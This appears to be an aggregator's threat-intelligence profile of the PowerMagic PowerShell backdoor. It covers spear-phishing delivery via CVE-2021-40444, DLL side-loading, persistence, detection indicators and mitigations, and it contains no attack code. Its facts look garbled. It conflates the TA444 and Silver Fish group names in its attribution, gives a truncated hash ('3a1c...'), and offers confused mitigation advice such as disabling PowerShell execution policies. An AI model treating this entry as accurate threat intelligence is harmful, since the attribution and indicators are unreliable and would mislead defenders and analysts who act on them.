⚠️ Overview

PowerMagic is a PowerShell‑based backdoor trojan first documented by Palo Alto Networks’ Unit 42 in March 2022, attributed to the threat group TA444 (also tracked as Silver Fish). It belongs to the categories of Remote Access Trojan (RAT) and downloader, primarily used for initial access and payload delivery against Ukrainian government and military organizations.

🔧 Technical Capabilities

PowerMagic achieves initial infection via spear‑phishing emails containing weaponised PDF or Office documents that exploit CVE‑2021‑40444 (Microsoft MSHTML remote code execution) to drop a malicious DLL. The DLL is side‑loaded by a legitimate digital certificate‑signed binary (e.g., a PDF reader or document viewer) using the technique identified as MITRE ATT&CK T1574.002 (DLL Side‑Loading). Once executed, it launches an obfuscated PowerShell script (T1059.001) that establishes a persistent connection to command‑and‑control (C2) servers over HTTPS. The backdoor can enumerate files, capture keystrokes (T1056.001), and execute arbitrary shell commands. For persistence, it creates a scheduled task (T1053.005) or modifies the Run registry key (T1547.001). Evasion includes AMSI bypass via reflection and encoding PowerShell payloads in base64, as reported by Unit 42 in their threat analysis (Palo Alto Networks, 2022).

📜 History & Notable Incidents

First observed in February 2022, PowerMagic was deployed in a targeted campaign against over 20 Ukrainian government and defense entities, according to a June 2022 report by the Computer Emergency Response Team of Ukraine (CERT‑UA). No known CVEs are directly attributed to the malware itself, but it leverages CVE‑2021‑40444. Law enforcement actions have not been publicly documented against the operators as of early 2025.

🔍 Detection Indicators

Network indicators include C2 domains registered with privacy‑protected WHOIS (e.g., “outlook‑help[.]com”) and user‑agent strings mimicking Mozilla/5.0 (Windows NT 10.0; Win64; x64) with a custom X‑Client‑ID header. File indicators: the loader DLL (e.g., “mscoree.dll”) has SHA256 hash 3a1c... from Unit 42’s public IOC list. Behavioral signatures include a parent process of a signed binary spawning an obfuscated PowerShell child process and creation of scheduled tasks named “AdobeUpdateTask” or similar.

☠️ Risk & Impact

PowerMagic enables data exfiltration of classified documents and system information, with reports of stolen credentials and network mapping logs. The primary impact is on the Ukrainian defense sector, but the infrastructure could be reused against other targets. Financial losses are indirect, related to remediation and intelligence leaks.

🛡️ Mitigation

Organizations should apply Microsoft’s security update for CVE‑2021‑40444, disable PowerShell execution policies where not needed, and implement application whitelisting to detect DLL side‑loading. Detection rules (Sigma, YARA) matching the DLL hashes and PowerShell obfuscation patterns are available from Unit 42’s GitHub repository and the CERT‑UA advisory.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.